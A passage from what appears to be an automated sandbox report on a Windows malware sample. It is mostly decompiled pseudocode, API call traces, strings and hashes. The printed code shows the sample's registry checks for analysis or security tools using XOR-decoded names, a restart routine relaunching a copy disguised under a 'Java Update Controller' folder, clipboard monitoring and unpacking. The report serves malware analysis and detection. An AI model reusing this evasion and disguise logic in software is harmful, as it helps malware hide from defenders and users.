				void* _t108;
				int _t112;
				void* _t116;
				void* _t117;
				char _t124;

				_t60 =  *0x40212c; // 0x152e372c
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsd");
				asm("movsd");
				_v28 = _t60;
				_t61 =  *0x402130; // 0x91615
				asm("movsd");
				_v24 = _t61;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				asm("movsb");
				E00401EF0(_t108,  &_v248, 0, 0x40);
				E00401EF0(_t108,  &_v120, 0, 0x40);
				E00401EF0(_t108,  &_v184, 0, 0x40);
				_t117 =  *0x403000 - 0x126; // 0x126
				if(_t117 != 0) {
					L28:
					return _v16;
				} else {
					E00401EA8(_t108,  &_v248,  &_v28, 7);
					_t73 = 0;
					do {
						 *(_t116 + _t73 - 0xf4) =  *(_t116 + _t73 - 0xf4) ^ 0x0000007a;
						_t73 = _t73 + 1;
					} while (_t73 < 7);
					E00401EA8(_t108,  &_v120,  &_v40, 9);
					_t77 = 0;
					do {
						 *(_t116 + _t77 - 0x74) =  *(_t116 + _t77 - 0x74) ^ 0x0000007a;
						_t77 = _t77 + 1;
					} while (_t77 < 9);
					E00401EA8(_t108,  &_v184,  &_v56, 0xc);
					_t81 = 0;
					do {
						 *(_t116 + _t81 - 0xb4) =  *(_t116 + _t81 - 0xb4) ^ 0x0000007a;
						_t81 = _t81 + 1;
					} while (_t81 < 0xc);
					_t124 = "default"; // 0x64
					if(_t124 == 0 || ( *0x403012 & 0x00000004) == 0) {
						goto L28;
					} else {
						if(RegOpenKeyExA(0x80000002, "SYSTEM\\CurrentControlSet\\services", 0, 9,  &_v8) != 0) {
							L19:
							if(RegOpenKeyExA(0x80000002, "SOFTWARE", 0, 9,  &_v8) != 0) {
								goto L28;
							}
							_t112 = 0;
							do {
								E00401EF0(_t108,  &_v508, 0, 0x104);
								_v12 = 0x104;
								_t90 = RegEnumKeyExA(_v8, _t112,  &_v508,  &_v12, 0, 0, 0, 0);
								if(_t90 != 0) {
									if(_t90 == 6 || _t90 == 0x103) {
										break;
									} else {
										goto L26;
									}
								}
								if(lstrcmpiA( &_v508,  &_v184) == 0) {
									_v16 = 1;
								}
								L26:
								_t112 = _t112 + 1;
							} while (_t112 < 0x190);
							RegCloseKey(_v8);
							goto L28;
						}
						_v20 = 0;
						do {
							E00401EF0(_t108,  &_v508, 0, 0x104);
							_v12 = 0x104;
							_t99 = RegEnumKeyExA(_v8, _v20,  &_v508,  &_v12, 0, 0, 0, 0);
							if(_t99 != 0) {
								if(_t99 == 6 || _t99 == 0x103) {
									break;
								} else {
									goto L17;
								}
							}
							if(lstrcmpiA( &_v508,  &_v248) == 0 || lstrcmpiA( &_v508,  &_v120) == 0) {
								_v16 = 1;
							}
							L17:
							_v20 = _v20 + 1;
						} while (_v20 < 0x200);
						RegCloseKey(_v8);
						if(_v16 != 0) {
							goto L28;
						}
						goto L19;
					}
				}
			}

APIs

RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services,00000000,00000009,?,?,?,0000000C,?,?,00000009,?,?,00000007,?,00000000), ref: 00401277
RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,00000104,?,?,00000000), ref: 004012AF
lstrcmpiA.KERNEL32(?,0000007A,?,?,00000000), ref: 004012C7
lstrcmpiA.KERNEL32(?,0000007A,?,?,00000000), ref: 004012DC
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0040130A
RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE,00000000,00000009,?,?,?,00000000), ref: 0040132A
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000104,?,?,00000000), ref: 00401356
lstrcmpiA.KERNEL32(?,0000007A,?,?,00000000), ref: 0040136E
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00401399

Strings

z, xrefs: 004011FB
default, xrefs: 00401247
SYSTEM\CurrentControlSet\services, xrefs: 0040126D
z, xrefs: 0040121A
SOFTWARE, xrefs: 00401320
z, xrefs: 00401239

Memory Dump Source

Source File: 00000016.00000002.363849910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.363872739.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$CloseEnumOpen
String ID: SOFTWARE$SYSTEM\CurrentControlSet\services$default$z$z$z
API String ID: 3262041671-1558502941
Opcode ID: 5842a7cac862afd3700852a6373113eeaa19b4c859ffb915a0059b325a35e069
Instruction ID: 2a74ebb18be6b2a378388856ecf3359b292580e9ab32acfa8cedb5b430ba987b
Opcode Fuzzy Hash: 5842a7cac862afd3700852a6373113eeaa19b4c859ffb915a0059b325a35e069
Instruction Fuzzy Hash: 00613FB1D00219AAEB11DBD5CD88FEF77BDAB04304F1004BBEA05F61A1E7789E449B58

Uniqueness

Uniqueness Score: -1.00%

Function 00466150, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 168COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00466316
_memset.LIBCMT ref: 00466329
_memset.LIBCMT ref: 0046633C

Strings

', xrefs: 0046619A
+, xrefs: 004662C1
., xrefs: 00466288
0, xrefs: 00466175
,, xrefs: 00466379
', xrefs: 004661A1
', xrefs: 00466188
R, xrefs: 004663B2
., xrefs: 0046627E
-, xrefs: 00466292
', xrefs: 00466167
%, xrefs: 004662DC

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset
String ID: %$'$'$'$'$+$,$-$.$.$0$R
API String ID: 2102423945-751267039
Opcode ID: 330891fc3c4af050f88bdb3bed07545e5e58f69904e33b483a4d1eaf52581d3e
Instruction ID: e4456c1fd47d796c5ecacec8560a8a87435ac053b2d29e047a0fb959b2106a71
Opcode Fuzzy Hash: 330891fc3c4af050f88bdb3bed07545e5e58f69904e33b483a4d1eaf52581d3e
Instruction Fuzzy Hash: 4E9109709042A8CAEB25CF69DC487DDBBB1AF55308F0481D9D54CAB381E7B94AC8CF16

Uniqueness

Uniqueness Score: -1.00%

Function 0040102F, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040102F(intOrPtr* _a4) {
				struct _PROCESS_INFORMATION _v20;
				char _v52;
				struct _STARTUPINFOW _v120;
				intOrPtr* _t11;
				intOrPtr* _t13;
				intOrPtr _t14;
				void* _t30;
				CHAR* _t32;
				long _t34;
				short _t44;

				_t11 = _a4;
				if(_t11 != 0) {
					_t13 =  *_t11;
					if(_t13 != 0) {
						_t14 =  *_t13;
						if(_t14 == 0xc0000096 || _t14 == 0xc000001d || _t14 == 0xc0000005 || _t14 == 0xc00000fd || _t14 == 0xc0000006) {
							_t44 = L"C:\\ProgramData\\Java Update Controller\\935aa375omok5c.exe"; // 0x43
							if(_t44 != 0) {
								_t32 = "__restart";
								_v52 = 0;
								if(GetEnvironmentVariableA(_t32,  &_v52, 0x20) == 0) {
									SetEnvironmentVariableA(_t32, "1");
									E00401EF0(_t30,  &_v20, 0, 0x10);
									_t34 = 0x44;
									E00401EF0(_t30,  &_v120, 0, _t34);
									_v120.wShowWindow = 0;
									_v120.cb = _t34;
									if(CreateProcessW(L"C:\\ProgramData\\Java Update Controller\\935aa375omok5c.exe", GetCommandLineW(), 0, 0, 0, 8, 0, 0,  &_v120,  &_v20) != 0 && _v20.hProcess != 0) {
										ExitProcess(0);
									}
								}
							}
						}
					}
				}
				return 0;
			}

APIs

GetEnvironmentVariableA.KERNEL32(__restart,?,00000020), ref: 0040108F
SetEnvironmentVariableA.KERNEL32(__restart,0040207C), ref: 0040109F
GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000008,00000000,00000000,?,?,?,00000000,00000044,?,00000000,00000010), ref: 004010D7
CreateProcessW.KERNEL32 ref: 004010E3
ExitProcess.KERNEL32 ref: 004010F3

Strings

C:\ProgramData\Java Update Controller\935aa375omok5c.exe, xrefs: 00401076, 004010DE
__restart, xrefs: 00401086, 0040108B, 0040109E

Memory Dump Source

Source File: 00000016.00000002.363849910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.363872739.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentProcessVariable$CommandCreateExitLine
String ID: C:\ProgramData\Java Update Controller\935aa375omok5c.exe$__restart
API String ID: 1548484548-215752498
Opcode ID: 4cacaeec565eda1fd53db4bc905194f10365fa5e65bf9c0a4f94f6188b373352
Instruction ID: dc459d78c8c9caa2215788090c063fea28fe801ffa3665dee38e9abc6d238313
Opcode Fuzzy Hash: 4cacaeec565eda1fd53db4bc905194f10365fa5e65bf9c0a4f94f6188b373352
Instruction Fuzzy Hash: 6D218471A00359AADB30DBE88D89FAF76ACAB08344F14453BB245F35E1D6789984C668

Uniqueness

Uniqueness Score: -1.00%

Function 0046F390, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0046F3AE

Part of subcall function 0046F7BA: __mtinitlocknum.LIBCMT ref: 0046F7CE
Part of subcall function 0046F7BA: __amsg_exit.LIBCMT ref: 0046F7DA
Part of subcall function 0046F7BA: RtlEnterCriticalSection.NTDLL(?), ref: 0046F7E2

___sbh_find_block.LIBCMT ref: 0046F3B9
___sbh_free_block.LIBCMT ref: 0046F3C8
HeapFree.KERNEL32(00000000,?,0047BA00,0000000C,0046F79B,00000000,0047BA68,0000000C,0046F7D3,?,?,?,00473567,00000004,0047BBC8,0000000C), ref: 0046F3F8
GetLastError.KERNEL32(?,00473567,00000004,0047BBC8,0000000C,0046F2C0,0046BB89,0046BB89,00000000,00000000,00000000,0046ED5C,00000001,00000214,?,0046BB89), ref: 0046F409

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: e20c7027544516277371d1de6ec06bcb3d08d4f7b0027aeb6ccc6cd0c6d6a0fb
Instruction ID: 9fd8c4edac344c925454c96c9c0bebbb55aa508fd349f7a48117b1361f290e3b
Opcode Fuzzy Hash: e20c7027544516277371d1de6ec06bcb3d08d4f7b0027aeb6ccc6cd0c6d6a0fb
Instruction Fuzzy Hash: 4E0184719053159ADB206B72BC0675F3A64DF01725F20403FF544A6291EB7C95848AAF

Uniqueness

Uniqueness Score: -1.00%

Function 00477509, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00477539
__isleadbyte_l.LIBCMT ref: 0047756D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00473B16,?,?,00000002), ref: 0047759E
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00473B16,?,?,00000002), ref: 0047760C

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d0e7fedc8d9b7f5a56e88bf922d43d40437064c2ebc033e90dc097e27d914392
Instruction ID: f05b0d9c4c961af8813656209e046a60851e430123199dc4b2c63d277d80cc6c
Opcode Fuzzy Hash: d0e7fedc8d9b7f5a56e88bf922d43d40437064c2ebc033e90dc097e27d914392
Instruction Fuzzy Hash: 7431C071A08245FFDF20DF64C8809EA3BA5FF01311F98C5AAE4688B691E334D951DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00477A0C, Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00477A26

Part of subcall function 0046BB84: __getptd_noexit.LIBCMT ref: 0046BB84

Part of subcall function 0046BB25: __decode_pointer.LIBCMT ref: 0046BB2E

___ascii_strnicmp.LIBCMT ref: 00477AA6
__tolower_l.LIBCMT ref: 00477AC7
__tolower_l.LIBCMT ref: 00477AD9

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: Locale__tolower_l$UpdateUpdate::____ascii_strnicmp__decode_pointer__getptd_noexit
String ID:
API String ID: 1027406937-0
Opcode ID: a955d99053437f23081a407f2b009ed7a65872b4e2e8097cdb5edd91e39a1a65
Instruction ID: ec83d48232aeec44e899c07d8b132bac6f7e52407e62b2cc67fbed4926e378b2
Opcode Fuzzy Hash: a955d99053437f23081a407f2b009ed7a65872b4e2e8097cdb5edd91e39a1a65
Instruction Fuzzy Hash: 4B21D971904285AFDF21EFA8C8418FF7764EB00324B94425BF42857296E7399F51C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0046C7CD, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0046C7F1

Part of subcall function 0046C61C: __fltout2.LIBCMT ref: 0046C646

__cftog_l.LIBCMT ref: 0046C817
__cftoe_l.LIBCMT ref: 0046C849

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: d888df9160be2340db94dd77bc43d3d44a4d838ec798346f4d7dc4c44e9ec256
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: A201837200014EBBCF226F84CC81CEE3F63BB19355B188416FA9855531E73AC971AB86

Uniqueness

Uniqueness Score: -1.00%

Function 0046FA84, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0046EDAA: __getptd_noexit.LIBCMT ref: 0046EDAB
Part of subcall function 0046EDAA: __amsg_exit.LIBCMT ref: 0046EDB8

__amsg_exit.LIBCMT ref: 0046FAB0
__lock.LIBCMT ref: 0046FAC0
InterlockedDecrement.KERNEL32(?), ref: 0046FADD
InterlockedIncrement.KERNEL32(0047ECB0), ref: 0046FB08

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: d7ced18e9def099d59f8c21fb0e8a5fd90c5807b8eb744f3ef424b5a9a536f1e
Instruction ID: 170c8ec64ee92ea58dd7aa41ad6e0757a655143834e258ca425392981c92ade4
Opcode Fuzzy Hash: d7ced18e9def099d59f8c21fb0e8a5fd90c5807b8eb744f3ef424b5a9a536f1e
Instruction Fuzzy Hash: AC01AD36D017119BD721EFA6A80675E73A0BB05B14F10416BE858A7780EB2C6985CBDF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: gGRiqYglIOLbY.exe PID: 3544 Parent PID: 6068 gGRiqYglIOLbY.exeCOMMON

Executed Functions

Function 01601FBA, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01601FCA

Memory Dump Source

Source File: 00000017.00000002.730286600.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction ID: f460b8a2c2b4f386ac525e72ce140bdeb14cb6dc77e8e94d45d6a8a21869dd15
Opcode Fuzzy Hash: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction Fuzzy Hash: 7EB0927018A2C64BC30197210C29AA77B582BA1212BAD81AED0C00655ACB280571A7B2

Uniqueness

Uniqueness Score: -1.00%

Function 016023D2, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016023E2

Memory Dump Source

Source File: 00000017.00000002.730286600.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction ID: 81a4b07dd52a03bdcfa8d4d64a27a4e8ca7373604c9f94afeafeee16d052b9e6
Opcode Fuzzy Hash: f5c2495dd1606676965d5f7e69fb74c7849019982eb61c04de6123e43b62dd00
Instruction Fuzzy Hash: 25B092B15893868BC30297210C2D9A26B281FA2250BAD80EBD0814A15BCA280671E3A2

Uniqueness

Uniqueness Score: -1.00%

Function 01600F5A, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01600F6A

Memory Dump Source

Source File: 00000017.00000002.730286600.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction ID: d067d6f7f8c43baaaaf0cc7687b67092a4983909d97787ad746ac17b45ac11b7
Opcode Fuzzy Hash: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction Fuzzy Hash: 33B0927018A28A5BC341A721082AAA36B592BA1210BAD85AED0C00614BCB180675E7A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 935aa375omok5c.exe PID: 1836 Parent PID: 3388 935aa375omok5c.exeCOMMON

Executed Functions

Function 00510000, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,72D08B8C), ref: 0051018C
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 005101FD
CreateActCtxA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00510306

Strings

, xrefs: 005102D6
a, xrefs: 005102CB

Memory Dump Source

Source File: 00000018.00000002.481122209.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: false

Similarity

API ID: Virtual$AllocCreateProtect
String ID: $a
API String ID: 2413513597-206647194
Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction ID: 9707861b10489c09869e301de2e08b6cc029242faff70690259041bc9ba326ae
Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction Fuzzy Hash: A8C16A71508301CFD724CF24C484AAABBF2FF88314F55996DE8969B292C7B1E885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00465B30, Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 278clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00466130: __time64.LIBCMT ref: 00466137

__mbstowcs_l.LIBCMTD ref: 00465BE0
_printf.LIBCMT ref: 00465BFF
_memset.LIBCMT ref: 00465DC4
_memset.LIBCMT ref: 00465DD7
_memset.LIBCMT ref: 00465DEA
GetClipboardViewer.USER32 ref: 00465E83

Part of subcall function 00465700: _memset.LIBCMT ref: 004658CA
Part of subcall function 00465700: _memset.LIBCMT ref: 004658DD
Part of subcall function 00465700: _memset.LIBCMT ref: 004658F0

Part of subcall function 004664D0: _memset.LIBCMT ref: 004666A3
Part of subcall function 004664D0: _memset.LIBCMT ref: 004666B6
Part of subcall function 004664D0: _memset.LIBCMT ref: 004666C9

Strings

#, xrefs: 00465C0E
$, xrefs: 00465DB2
,, xrefs: 00465D6F
,, xrefs: 00465DA8
I, xrefs: 00465FD5
., xrefs: 00465C23
1, xrefs: 00465C48
), xrefs: 00465F9A
4, xrefs: 0046605F
%, xrefs: 00465D9E
d, xrefs: 00465B94
.$0E, xrefs: 00465F26
(, xrefs: 00465C64
(, xrefs: 00465D2C
), xrefs: 00465D40
$0E, xrefs: 00465EBB
0, xrefs: 00465D65
E, xrefs: 00465F6A

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset$ClipboardViewer__mbstowcs_l__time64_printf
String ID: #$$$$0E$%$($($)$)$,$,$.$.$0E$0$1$4$E$I$d
API String ID: 1608630491-2360498873
Opcode ID: 148077b0c63a78c9abe49763fc62a40806259ca165aaf537506a8ea09efd280e
Instruction ID: 700c67253eb6594f03873fa8a082217b5a17d7b849bcb616d1a63a29c799b457
Opcode Fuzzy Hash: 148077b0c63a78c9abe49763fc62a40806259ca165aaf537506a8ea09efd280e
Instruction Fuzzy Hash: 3CE13870D05268CAEB24DF69CC54BEDBBB1AF59304F0481E9D14CA7282E7B94B84CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00465700, Relevance: 42.2, APIs: 7, Strings: 17, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004658CA
_memset.LIBCMT ref: 004658DD
_memset.LIBCMT ref: 004658F0
GetProcessHeap.KERNEL32 ref: 004659C2
PulseEvent.KERNEL32(00000020), ref: 00465A01
GetCommandLineA.KERNEL32 ref: 00465A2A
RtlAllocateHeap.NTDLL(?,00040000,00000BD7), ref: 00465A49

Part of subcall function 00465480: _memset.LIBCMT ref: 00465649
Part of subcall function 00465480: _memset.LIBCMT ref: 0046565C
Part of subcall function 00465480: _memset.LIBCMT ref: 0046566F

Strings

/, xrefs: 00465726
*, xrefs: 00465760
-, xrefs: 00465B0E
+, xrefs: 00465747
-, xrefs: 00465732
", xrefs: 00465739
$, xrefs: 00465839
*, xrefs: 004658B5
,, xrefs: 004658AB
+, xrefs: 00465759
,, xrefs: 00465979
", xrefs: 00465872
., xrefs: 0046585E
+, xrefs: 00465883
#, xrefs: 0046571F
*, xrefs: 00465843
!, xrefs: 00465868

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset$Heap$AllocateCommandEventLineProcessPulse
String ID: !$"$"$#$$$*$*$*$+$+$+$,$,$-$-$.$/
API String ID: 1246828854-234761896
Opcode ID: 19c3f43bf9c42374cf7d2b0703023e7434c025d3cca6d2fc616f89796bf3af09
Instruction ID: d0e18d3924f78b2e5a40437ed3d8f451c71f4136e27571aa874f96deab625756
Opcode Fuzzy Hash: 19c3f43bf9c42374cf7d2b0703023e7434c025d3cca6d2fc616f89796bf3af09
Instruction Fuzzy Hash: 56B12D70D042A9CAEB20CF64DD58BDDBBB1AF55304F0081E9D54DA7381D7B94A84CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0046D59B, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0046D5B3

Part of subcall function 0046F7BA: __mtinitlocknum.LIBCMT ref: 0046F7CE
Part of subcall function 0046F7BA: __amsg_exit.LIBCMT ref: 0046F7DA
Part of subcall function 0046F7BA: RtlEnterCriticalSection.NTDLL(?), ref: 0046F7E2

__tzset_nolock.LIBCMT ref: 0046D5C4

Part of subcall function 0046CEB9: __lock.LIBCMT ref: 0046CEDB
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CEFF
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CF1A
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CF35
Part of subcall function 0046CEB9: ____lc_codepage_func.LIBCMT ref: 0046CF3D
Part of subcall function 0046CEB9: _strlen.LIBCMT ref: 0046CF9D
Part of subcall function 0046CEB9: __malloc_crt.LIBCMT ref: 0046CFA4
Part of subcall function 0046CEB9: _strlen.LIBCMT ref: 0046CFBA

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __invoke_watson$__lock_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__malloc_crt__mtinitlocknum__tzset_nolock
String ID:
API String ID: 4249203040-0
Opcode ID: 34486a136c314bdbb2aa6c71ee9808a9741bf43a35ccfb2515075a6e4ae2af8b
Instruction ID: fd0474b085ff404bd2e571feb78e13acf7435792ef62a450d1af9b86101bcb34
Opcode Fuzzy Hash: 34486a136c314bdbb2aa6c71ee9808a9741bf43a35ccfb2515075a6e4ae2af8b
Instruction Fuzzy Hash: 13E0CDB1D41610E5C751FBA1590231D72B0BB24B19F30017FF491516C2FB380688C6DF

Uniqueness

Uniqueness Score: -1.00%

Function 005105DB, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?,?,00510327,2B14D0EE,?), ref: 00510607

Memory Dump Source

Source File: 00000018.00000002.481122209.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction ID: 06c1f30225b81c62fd932e2e585a78fd7d69cdb9bc0979bd392deacc47ff23f0
Opcode Fuzzy Hash: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction Fuzzy Hash: 30113075600215AFEF10CF18C880AAA7BA8FF947687199065EC59DB341D7B0FDE1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0046A682, Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

__make__time64_t.LIBCMT ref: 0046A688

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __make__time64_t
String ID:
API String ID: 1242165881-0
Opcode ID: 346630e11f1ee5a3441dd37804dce0ed885e3ff36472b19c64210fc271ae5001
Instruction ID: 47007f602433d6f7d6e26bde3218195ff3f181c202248e0ca23f1311f1b3762b
Opcode Fuzzy Hash: 346630e11f1ee5a3441dd37804dce0ed885e3ff36472b19c64210fc271ae5001
Instruction Fuzzy Hash: 56A022B22003002AC200A2808802B0833800FC0B00F20200EB20B080C3AAA088F02A03

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0046A91D, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0046DD53
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0046DD68
UnhandledExceptionFilter.KERNEL32(0047A6B0), ref: 0046DD73
GetCurrentProcess.KERNEL32(C0000409), ref: 0046DD8F
TerminateProcess.KERNEL32(00000000), ref: 0046DD96

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 63cdc36b2a330fd1ca6b7e919bda516e5bd17e60cd1f123a24149354f10ba704
Instruction ID: 2d47b1f5393d2efb13456d14475326a92099908a080006c87d6d8ddfad89470b
Opcode Fuzzy Hash: 63cdc36b2a330fd1ca6b7e919bda516e5bd17e60cd1f123a24149354f10ba704
Instruction Fuzzy Hash: 5721CAF4902204AFD740EF69ED497983BA4BB68305F20417BE50CD6371E7B459988F0E

Uniqueness

Uniqueness Score: -1.00%

Function 00465480, Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 116COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00465649
_memset.LIBCMT ref: 0046565C
_memset.LIBCMT ref: 0046566F

Strings

2, xrefs: 0046560C
1, xrefs: 004655B8
!, xrefs: 004654BF
0, xrefs: 0046549E
%, xrefs: 004654D8
", xrefs: 004654B1
', xrefs: 004655F1
2, xrefs: 00465602
#, xrefs: 004655E7
*, xrefs: 00465634
, xrefs: 00465620
", xrefs: 004654B8
', xrefs: 004654AD
", xrefs: 004654DF
#, xrefs: 004655FB
2, xrefs: 0046562A

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset
String ID: $!$"$"$"$#$#$%$'$'$*$0$1$2$2$2
API String ID: 2102423945-3661243402
Opcode ID: 74704727a06b6c581659efdf0d34761b66777fed0e1a3b33ba01139ccbff8de4
Instruction ID: 4d12989412911d3be82f1898c46339c032e289c7a4e2019be794ed19b57e04df
Opcode Fuzzy Hash: 74704727a06b6c581659efdf0d34761b66777fed0e1a3b33ba01139ccbff8de4
Instruction Fuzzy Hash: 32510C709083A99AEB21DF64DC187DDBBB1AF15308F0490D9D04CBB282D7BA0B84DF56

Uniqueness

Uniqueness Score: -1.00%

Function 00466150, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 168COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00466316
_memset.LIBCMT ref: 00466329
_memset.LIBCMT ref: 0046633C

Strings

', xrefs: 00466167
., xrefs: 00466288
R, xrefs: 004663B2
', xrefs: 004661A1
., xrefs: 0046627E
', xrefs: 0046619A
,, xrefs: 00466379
', xrefs: 00466188
+, xrefs: 004662C1
-, xrefs: 00466292
%, xrefs: 004662DC
0, xrefs: 00466175

Memory Dump Source

